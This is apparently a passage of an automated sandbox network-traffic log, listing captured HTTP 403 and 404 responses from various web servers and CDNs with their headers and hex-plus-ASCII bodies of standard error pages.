                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:03 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:03 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:04 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:04 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:08 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CYuZzlwhAu6okrcr0%2FeaVJNBor8NQaejcMgW7mE4J1bq45LF8NBxudAB8IqhVLWqI6ZQdmU7nzeUV%2FdZTWFTfx7ZeaBHIyGvYc3wISMVNK4qPMgnIJCZ2FSc8ow9U9kK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc716ebf56927-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:08 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Vffi7bJZEXX1nzarWsibp8bBualMfosr%2Bc7Y8kUR5zRH69mQhEh8kEXbMpD%2FciH91M85JWctT2Dj0WQrEcZriVJYfbuFudpOWP6Q4RhQUckOnADMZgW%2F6HsAiRAYTcY0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc7171c206927-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:44:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: b38d5bc2-8f60-4123-a318-1fe086a2e062CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FykziS1%2Fp74oM6ZcG2gTm0i3pnfPuo7htXYSmfFYIU9BnM6oseYz6aTyGyQZ1%2FzrQ%2BAswBr9F2na6WCpK%2FxUYLX18N6lZMGhWWk9yqn0a7C4TGttK6%2FHCJ9VpIoMz%2BI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=148.000002Server: cloudflareCF-RAY: 7abbc716ece4365b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Wed, 22 Mar 2023 04:44:08 GMTX-Zen-Fury: be664561f886b67fcad1797bbb649cf60e7a95eeX-Cache-Status: Server: ZENEDGECache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Data Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 32 30 34 37 22 2c 20 31 36 37 39 34 36 30 31 39 34 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC2047", 1679460194, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:10 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tB%2Btff9OWwJ0JEWOZmNvf21TPOl30LS9XlvoR0qyyX%2BCHhwMExKqldzR4ojhS0xw0B6mzulkAlugHG7BnXuAwe1XYPalfqMx5yMhjMPcUE4a%2B8k5C%2BXxYQHfztUejh0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc7247d4a381a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:10 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UjGdd6w0IysnIygIgbxAWXPOck%2BNEFGZsUdM4wGzMbAXC864RfMlunUmVde3uQzRACmeGrgpHu02mZgPJZ5LoJhyQyRPY8aF0JfCKgHfrD7%2BPMcbG6XHfiQPVkVu4Uo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc724ad6b381a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:11 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMe30U7RbSHN8wnIjYHleQHv,qquldgcFrj2n046g4RNSVMxfheUO4XmnqrwYf15pULU=X-Wix-Request-Id: 1679460251.22815511591416223X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: 0cea13f68d stream 0.000000 0200 57daPragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=V9AzL0R1cCpLX%2Bh9rVt7IzwHPs%2BhznhYwcmuYaI24Bhtuu7ymmYBHJ8tLPsSsJYUBQsA6Nfn%2FG8kgBRWCq6P%2BwH96l6luLQ3mzqbWdUa8kY6oG6XGTfkeU3XCu7bxihxa7M%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc73069d62bdc-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-s
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:44:18 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:44:19 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 